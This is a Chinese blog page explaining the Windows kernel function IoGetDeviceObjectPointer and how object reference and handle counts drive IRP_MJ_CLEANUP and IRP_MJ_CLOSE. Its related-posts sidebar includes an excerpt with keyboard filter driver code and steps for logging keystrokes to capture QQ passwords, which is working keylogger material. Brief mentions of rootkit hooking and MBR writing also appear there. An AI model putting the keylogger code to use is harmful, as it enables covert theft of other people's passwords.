关于IoGetDeviceObjectPointer函数

最新推荐文章于 2018-04-30 16:24:21 发布
最新推荐文章于 2018-04-30 16:24:21 发布
阅读量2.3k 收藏 1
点赞数

IoGetDeviceObjectPointer函数从下层的设备对象名称来获得下层设备指针。该函数造成了对下层设备对象以及下层设备对象所对应的文件对象的引用。如果本层驱动在卸载之前对下层的设备对象的引用还没有消除,则下层驱动的卸载会被停止。因此必须要消除对下层设备对象的引用。
但是程序一般不会直接对下层设备对象的引用减少。原因在于当文件对象的引用减小后,设备对象的引用也会相应自动减小。因此只要减少对文件对象的引用就可以减少文件对象和设备对象两个对象的引用。而如果单独再减少对设备对象的引用,会导致两次减少对设备对象的引用。但是,如果在本驱动的卸载例程之前减少了对文件对象的引用,从而导致设备对象的引用降为0,则有可能导致下层驱动对象的过早删除。因此,如果想在卸载例程之外减小对文件对象的引用,又要在减少对文件对象的引用之前对设备对象增加一次额外的引用,然后在减少对文件对象的引用之后再减小对设备对象的引用。
事实上,IoGetDeviceObjectPointer返回的并不是下层设备对象的指针。而是该设备堆栈中顶层的设备对象的指针。当然,IRP会一层一层的转发下去,因此下层驱动会得到该IRP。
IoGetDeviceObjectPointer在内部干了如下的操作。ZwCreateFile ObReferenceObjectByHandle ZwClose IoGetRelatedDeviceObject。在IoGetDeviceObjectPointer后如果调用了IoCallDriver发送私有IRP,然后又调用ObDereferenceObject,这一系列的操作会引发如下的IRP被发送到目标设备对象。IRP_MJ_CREATE IRP_MJ_CLEANUP IRP_MJ_DEVICECONTROL IRP_MJ_CLOSE。当有文件句柄被创建时,IRP_MJ_CREATE被发送;当所有文件句柄关闭时,IRP_MJ_CLEANUP被发送;IRP_MJ_DEVICECONTROL对应私有IRP发送;IRP_MJ_CLOSE则是ObDereferenceObject后文件对象的引用为0后被发送。由此可看出,IRP_MJ_CLEANUP是文件对象句柄计数为0时被发送,而IRP_MJ_CLOSE是文件对象的引用计数为0时发送。

对象的生命周期
一个内核对象有两种方式被引用。一个是指针,一个是句柄。当创建了一个新的指向该对象的指针时,内核的对象管理器就将该对象的引用计数增加1。当创建了一个新的指向该对象的句柄时,对象管理器不仅将该对象的引用计数加1还要将该对象的句柄技术加1。当一个对象的引用计数为0后,该对象就自动被对象管理器删除。注意,句柄计数为0并不意味着引用计数为0。但当句柄计数为0后,就不能再通过文件名称来操作该对象了。ZwClose在减小句柄计数的同时也减小了引用计数。而诸如IoGetDeviceObjectPointer的函数会在函数内部增加对对象指针,因此增加了对对象的引用。
对象可分为暂时对象和永久对象。在对象被创建时可以指定。永久对象就是对象被创建时对象管理器就将引用计数加1了的对象。这种对象总可以通过文件名来访问。永久对象可以被转化为暂时对象

danxuezx
关注
文件过滤驱动 VPB 卷参数块 生命周期 IoGetRelatedDeviceObject
baund的专栏
11-30 1万+
文件过滤驱动中,VPB(卷参数块),它将文件系统卷设备和磁盘设备卷设备联系起来,结构如下: typedef struct _VPB {     CSHORT Type;     CSHORT Size;     USHORT Flags;     USHORT VolumeLabelLength; // in bytes     struct _DEVICE_OBJECT *Devic
过滤驱动容易让新手纠结的几个函数
StoneRain
07-18 2916
1. IoAttachDevice NTSTATUS IoAttachDevice( IN PDEVICE_OBJECT SourceDevice, IN PUNICODE_STRING TargetDevice, OUT PDEVICE_OBJECT *AttachedDevice ); 将【指定指针】的设备对象附加到【指定名称】的设备对象所在的【设备对象栈】
IoGetDeviceObjectPointer .
acmumw248662的博客
06-11 102
从名字获得设备对象 驱动的起始地址,大小等信息。 转载于:https://www.cnblogs.com/Browneyes/p/4568670.html
IoGetDeviceObjectPointer
jtujtujtu的专栏
07-09 1199
从名字获得设备对象 在知道一个设备名字的情况下,使用函数IoGetDeviceObjectPointer可以获得这个设备对象的指针。这个函数的原型如下: NTSTATUS IoGetDeviceObjectPointer( IN PUNICODE_STRING  ObjectName, IN ACCESS_MASK  DesiredAccess, OUT PFILE_OB
关于将本层的IO_STACK_LOCATION拷贝到下一层的两种方法
chenyujing1234的专栏
08-07 1153
方法一:调用MS提供的标准方法IoCopyCurrentIrpStackLocationToNext(推荐使用此方法) 方法二: PIO_STACK_LOCATION IrpSp; PIO_STACK_LOCATION NextIrpSp; IrpSp = IoGetCurrentIrpStackLocation(Irp); NextIrpSp = Io
最简单的驱动helloWDM
05-07
这是一个最简单的驱动程序,新手可以看一下。这是驱动的第一步!
C/C++ 实现文件透明加解密
热门推荐
尹成的技术博客
11-05 1万+
    今日遇见一个开超市的朋友,真没想到在高校开超市一个月可以达到月净利润50K,相比起我们程序员的工资,真是不可同日而语,这个世道啊,真是做程序员不如经商开超市,我们高科技的从业者,真是造原子弹不如卖茶叶蛋。请见代码详细注释   //  修复涉及后视列表的Win2K兼容性//  Fixes Win2K compatibility regarding lookaside
关于绕过过滤驱动的资料的个人看法和摘要
skyair624的专栏
12-08 1346
    刻苦钻研了使用驱动直接使用IN/OUT指令来修改MBR,但是读取成功了,而写MBR却一直没有进展,到现在也没有写进去,汗…根据网友提供的链接发现了这篇文章,http://www.codeproject.com/KB/system/rawsectorio.aspx。以下所有的个人看法全部依据本文。     在看这篇文章之前倒是了解过winhex这款软件,也使用这个软件在ring3
Kernel 中调用其它驱动程序的几种方法
The past will never return.
10-13 1369
1.ZwCreateFile UNICODE_STRING DeviceName; RtlInitUnicodeString( &DeviceName, L"\\Device\\MyDDKDA" ); OBJECT_ATTRIBUTES objectAttribut
QQ密码记录程序
05-15
http://blog.csdn.net/xiaoxiao108/article/details/7563159 最近看了看c++,写个程序玩玩。因为用户态代码不好截取到qq密码,写个键盘分层驱动。试了试效果还可以。 开发环境 vs2008 winddk ddkwizard windowsxp Dbgview 实现方法 1.把过滤驱动挂载到键盘驱动上面 2.设置完成例程 3.通过KdPrint输出键盘扫描码到DebugView 4. 从DebugView的日志文件中读出键盘按键。 具体代码 1.把过滤驱动挂载到KeyBoardClass0上面 PFILE_OBJECT fileOjbect; PDEVICE_OBJECT deviceObject; UNICODE_STRING deviceName; PDEVICE_EXTENSION pdx; PDEVICE_OBJECT filterDeviceObject; PDEVICE_OBJECT targetDevice; fileOjbect=NULL; RtlInitUnicodeString(&deviceName;,L"\\Device\\KeyBoardClass0"); status=IoGetDeviceObjectPointer(&deviceName;,FILE_ALL_ACCESS,&fileOjbect;,&deviceObject;); pdoDeviceObj->Flags |= DO_BUFFERED_IO; pdx=(PDEVICE_EXTENSION)pdoDeviceObj->DeviceExtension; pdx->pDevice=pdoDeviceObj; pdx->ustrDeviceName=usDeviceName; filterDeviceObject=((PDEVICE_EXTENSION)DriverObject->DeviceObject->DeviceExtension)->pDevice; targetDevice=IoAttachDeviceToDeviceStack(filterDeviceObject,deviceObject); ((PDEVICE_EXTENSION)DriverObject->DeviceObject->DeviceExtension)->TargetDevice=targetDevice; filterDeviceObject->DeviceType=targetDevice->DeviceType; filterDeviceObject->Characteristics=targetDevice->Characteristics; filterDeviceObject->Flags&=~DO_DEVICE_INITIALIZING; filterDeviceObject->Flags|=(targetDevice->Flags&(DO_DIRECT_IO|DO_BUFFERED_IO)); ObDereferenceObject(fileOjbect); return STATUS_SUCCESS; 2.设置完成例程 PDEVICE_EXTENSION pdx; pdx=(PDEVICE_EXTENSION)DeviceObject->DeviceExtension; IoCopyCurrentIrpStackLocationToNext(Irp); IoSetCompletionRoutine(Irp,MyIoCompletion,NULL,TRUE,TRUE,TRUE); NTSTATUS status=IoCallDriver(pdx->TargetDevice,Irp); return status; 3.输出键盘按键的扫描码 NTSTATUS MyIoCompletion(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp,IN PVOID Context) { if(NT_SUCCESS(Irp->IoStatus.Status)) { PKEYBOARD_INPUT_DATA keys = (PKEYBOARD_INPUT_DATA)Irp->AssociatedIrp.SystemBuffer; if(keys->Flags==0x0001||keys->Flags==0x0003) KdPrint(("x",keys->MakeCode)); } if(Irp->PendingReturned) { IoMarkIrpPending(Irp); } return STATUS_SUCCESS; } 使用步骤 1.安装驱动 用DriverMonitor加载并运行Driver1.sys驱动文件 2.打开Dbgview,当按键时就可以看到dbgview中记录下的键盘扫描码 3.在dbgview中选择记录日志文件,处理下日志文件就可以得到qq密码了。 偶c语言菜鸟,欢迎大神们批评教育 不足的地方很多啊 多多交流 谢谢 邮箱328452421@qq.com http://blog.csdn.net/xiaoxiao108/article/details/7563159
IoGetRelatedDeviceObject学习
stecdeng的专栏
05-23 1305
PDEVICE_OBJECT IoGetRelatedDeviceObject(     IN PFILE_OBJECT FileObject     ) /*++ Routine Description:     This routine returns a pointer to the actual device object than an I/O     Request
11.driverbase-IoGetDeviceObjectPointer源码(need ObDereferenceObject)
hgy413的专栏
12-25 1490
DDK Build编译的时候,使用3个文件来描述被编译的源码,其中SOURCES和Makefile是必须的,而DIRS则只在划分目录的时候有用。Makefile在这里作用并不大但是必须和SOURCES文件成对出现,关键还是SOURCES和DIRS文件。 SOURCES文件用于描述其所在目录下,有哪些文件参与编译,编译的结果应该是什么(是一个lib还是一个sys?),输出目录在哪里,要传递
[转载]关于驱动中的ObReferenceObjectByName 和 IoGetDeviceObjectPointer
wowbell的专栏
03-17 2157
今天huhu0013问我为什么ObReferenceObjectByName不能得到Device类型的对象,讨论一番,最终得到如下解释,记录一下:================================================================================= 原文:http://www.boxcounter.org/?action=show&id=13前些阵子学写过滤驱动,遇到个问题,在网上找到了相应的资料,Blog下来。 我写的程序需要挂在文件系统上,
IoGetDeviceObjectPointer和ObReferenceObjectByName得到设备对象指针
125096
02-19 1160
//IoGetDeviceObjectPointer得到设备对象指针 UNICODE_STRING DeviceName; RtlInitUnicodeString(&DeviceName,L"\\Device\\MyDDKDeviceA"); PDEVICE_OBJECT DeviceObject=NULL; PFILE_OBJECT FileObject=NULL; NTSTATUS ntS
一个差点被IoGetDeviceObjectPointer搞死的菜鸟
Vinx Blog
04-13 2426
一个差点被IoGetDeviceObjectPointer搞死的菜鸟  最近被迫学习Windows驱动开发(有多少人跟我一样不是主动去学的),感觉有所得之后就写了个读取PCI配置信息的小小小小的驱动,结果。。。。。。。。。。。。成功了。当然要是真的成功了下面的内容就没有意义了。一次幸运的手贱,我把测试程序同时打开了好多个,于是系统很光荣的牺牲了。   。。。。。。   //此处省略N次摧残系统的
IoGetDeviceObjectPointer引起的引用计数改变
lixiangminghate的专栏
04-30 1093
    上周同事的驱动遇到HLK测试失败:HLK测试项检测到传感器设备驱动在响应IRP_MJ_PNP/IRP_MN_REMOVEDEVICE时,有句柄扔打开设备,于是我也帮着一起查找原因。这个驱动的架构如下设计:上层App负责通知驱动,驱动响应这个过程时,用IoGetDeviceObjectPointer获得并保持(IoGetDeviceObjectPointer后没有对返回的文件对象调用ObDe...
监视设备驱动通讯内容
04-22 1564
监视设备驱动通讯内容 Author:  sinisterEmail:   sinister@whitecell.orgHomepage:http://www.whitecell.org Date:    2006-01-10 /*****************************************
深度剖析:RootKithook实战揭秘objecthook的加密与隐藏技术
其次,文章提到rootkit利用objecthook技术实现突破还原卡原理,具体来说,IRP_MJ_CREATE例程在设备管理中起到了关键作用,通过IoGetDeviceObjectPointer函数获取硬盘设备对象,并检查设备栈上的设备挂载情况。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值